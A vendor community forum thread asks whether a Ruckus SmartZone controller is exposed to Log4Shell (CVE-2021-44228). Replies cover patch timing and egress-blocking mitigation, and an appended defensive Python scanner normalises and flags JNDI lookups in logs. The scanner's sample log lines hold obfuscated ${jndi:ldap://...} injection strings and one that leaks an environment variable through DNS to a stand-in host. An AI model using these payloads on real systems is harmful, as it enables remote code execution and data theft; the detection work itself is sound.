[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee
New Contributor II

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.


The customer asked whether the SmartZone is affected by the following security vulnerability.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.


@JTakaMT

Apologies for the inconvenience. The patch for all codes should be released by today "12/17/2021" EOD. The goal is:

We will have a KBA showing the process for loading the KSP on SZ.
The fixes/KSPs will be open for download for customers with or without support.
The aim is to ensure that our customers have the ability to self-help on existing versions as much as possible.

At last, sorry for the delay, but this will be a better outcome for all our customers and us, once completed.

Best Regards

Vineet


sven_siersdorfe
New Contributor II

I also don't get any information about the patch via chat or support case.

We need a solution here very quickly.

@sven_siersdorfer

Apologies for the inconvenience. The patch for all codes should be released by today "12/17/2021" EOD. The goal is:

We will have a KBA showing the process for loading the KSP on SZ.
The fixes/KSPs will be open for download for customers with or without support.
The aim is to ensure that our customers have the ability to self-help on existing versions as much as possible.

At last, sorry for the delay, but this will be a better outcome for all our customers and us, once completed.

Best Regards

Vineet


Thank you, Vineet

diego_garcia_de
Contributor III

To anyone wanting to mitigate the impact, the vulnerability has two parts:

1) Information disclosure. This one is hard to contain as it basically means the system is able to leak internal data via DNS requests. But this mechanism will not "infect" the system. Some information such as internal usernames, process permissions, environment variables can be leaked to external parties. But the vSZ will not be infected.

2) Full-on "remote code execution". This part of the attack means an external party is able to force the system to DOWNLOAD code and execute it. This one is the most dangerous one.

In my case, I have been able to mitigate the RCE (#2) by blocking all outgoing communication from SmartZone. You will have to add certain entries to the allow-list/whitelist such as any LDAP or RADIUS servers, syslog and email servers used for notifications and system logging, FTP/SFTP servers for backups, SPOT servers if you're using location-based services, but pretty much all other outgoing communication can be blocked.

This means that if the system TRIES to download the malware, it should be blocked by the external firewall.

In my case, SmartZone is deployed in Google Cloud so I rely on Google's cloud firewall to configure the blocks. I have only had communication to two IPs which I believe are either part of the licensing servers or something similar (they were Akamai IPs).

In my case, we have a Let's Encrypt certificate on the server so I'm seeing certain connections to "ocsp.int-x3.letsencrytp.org"
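Worked example for the two parts Diego describes above, added here as an illustration; it is not Ruckus code and not from any post in this thread. It runs a small Python scanner over constructed web-access log lines of the kind a controller might write: it undoes the common `${...}` obfuscations the way Log4j 2's own substitution does (nested lookups, `${lower:}` / `${upper:}`, `${name:-default}`, `${env:}`), never dereferences the resulting `${jndi:...}`, and reports for each one the scheme and host that would be contacted, which environment variables ended up in that host name (part 1: that data leaves in the DNS query for the host, which egress filtering on the controller does not stop), and whether a deny-by-default egress allow-list like the one described above would stop the fetch itself (part 2). The log lines, the process environment, the allow-list hostnames and the 203.0.113.0/24 and *.example addresses are all constructed; the normaliser covers only those lookup types, not Log4j's full lookup set.

```python
"""Log4Shell (CVE-2021-44228) log scanner: added example, not Ruckus code.

Normalises Log4j 2 lookup syntax for the common obfuscations, then reports
every ${jndi:...} target together with (1) the environment variables that
were substituted into the line (they leak via the DNS lookup of the host
name even when egress is blocked) and (2) whether a deny-by-default egress
allow-list would block the connection to that host.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed environment of a hypothetical controller process (assumption).
SAMPLE_ENV: Dict[str, str] = {"USER": "szadmin", "JAVA_HOME": "/opt/jdk"}

# Constructed egress allow-list: hosts the controller legitimately talks to.
SAMPLE_ALLOWLIST = {"ldap.corp.example", "radius.corp.example",
                    "syslog.corp.example", "smtp.corp.example", "sftp.corp.example"}

# Constructed log lines; 203.0.113.0/24 and *.example are documentation ranges.
SAMPLE_LOG: List[str] = [
    'GET /wsg/api/public/v8_0/session 200 "User-Agent: Mozilla/5.0"',
    'GET / 404 "User-Agent: ${jndi:ldap://203.0.113.10:1389/Exploit}"',
    'GET / 404 "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    'GET / 404 "User-Agent: ${${lower:J}ndi:dns://${env:USER}.${env:HOSTNAME:-nohost}.exfil.example/x}"',
]

# scheme and host of a normalised ${jndi:scheme://host[:port]/path} lookup
JNDI_RE = re.compile(r"\$\{jndi:([A-Za-z]+):/*([^/:}\s]+)")


def _lookup(content: str, env: Dict[str, str], used: List[str]) -> str:
    """Resolve one lookup body (text between '${' and '}') once nesting is gone."""
    name, default = content, None
    if ":-" in content:                      # ${name:-default}
        name, default = content.split(":-", 1)
    prefix, _, key = name.partition(":")
    if prefix == "jndi":                     # never dereference; keep for reporting
        return "${jndi:" + key + "}"
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "env" and key in env:
        used.append(key)                     # record what would leak
        return env[key]
    if default is not None:                  # unresolvable name falls back to default
        return default
    return "${" + content + "}"              # unknown lookup: leave literally


def _expand_var(text: str, i: int, env: Dict[str, str], used: List[str]) -> Tuple[str, int]:
    """Parse from just after '${' to the matching '}', expanding nested lookups first."""
    buf: List[str] = []
    while i < len(text) and text[i] != "}":
        if text.startswith("${", i):
            inner, i = _expand_var(text, i + 2, env, used)
            buf.append(inner)
        else:
            buf.append(text[i])
            i += 1
    if i >= len(text):                       # unterminated lookup: emit literally
        return "${" + "".join(buf), i
    return _lookup("".join(buf), env, used), i + 1


def expand_lookups(text: str, env: Dict[str, str], used: Optional[List[str]] = None) -> str:
    """Normalise a line the way Log4j 2 would substitute it, minus remote lookups."""
    used = [] if used is None else used
    out: List[str] = []
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            piece, i = _expand_var(text, i + 2, env, used)
            out.append(piece)
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def scan_line(line: str, env: Dict[str, str] = SAMPLE_ENV,
              allowlist=SAMPLE_ALLOWLIST) -> List[dict]:
    """Return one finding per JNDI lookup in the line (empty list for a clean line)."""
    used: List[str] = []
    normalised = expand_lookups(line, env, used)
    findings = []
    for scheme, host in JNDI_RE.findall(normalised):
        findings.append({
            "scheme": scheme.lower(),
            "host": host,
            # env values substituted anywhere in this line travel in the DNS
            # query for `host`; an egress firewall on the controller does not stop that
            "env_leaked": sorted(set(used)),
            # a deny-by-default egress policy does stop the class/payload fetch
            "egress_blocked": host not in allowlist,
        })
    return findings


def scan_log(lines: List[str] = SAMPLE_LOG) -> List[Tuple[int, dict]]:
    """Scan every line; returns (1-based line number, finding) pairs."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in scan_line(line)]


if __name__ == "__main__":
    for n, f in scan_log():
        print(f"line {n}: {f['scheme']}://{f['host']}  env leaked={f['env_leaked']}  "
              f"egress blocked={f['egress_blocked']}")
```

Run it as-is to see the three hits (the obfuscated line 3 normalises to the same ldap://203.0.113.10 target as line 2; line 4 shows USER leaving in the host name even though the ldap/dns fetch itself is blocked). To use it on real data, replace SAMPLE_LOG with lines read from the controller's exported logs and SAMPLE_ALLOWLIST with the hosts actually permitted by the egress firewall.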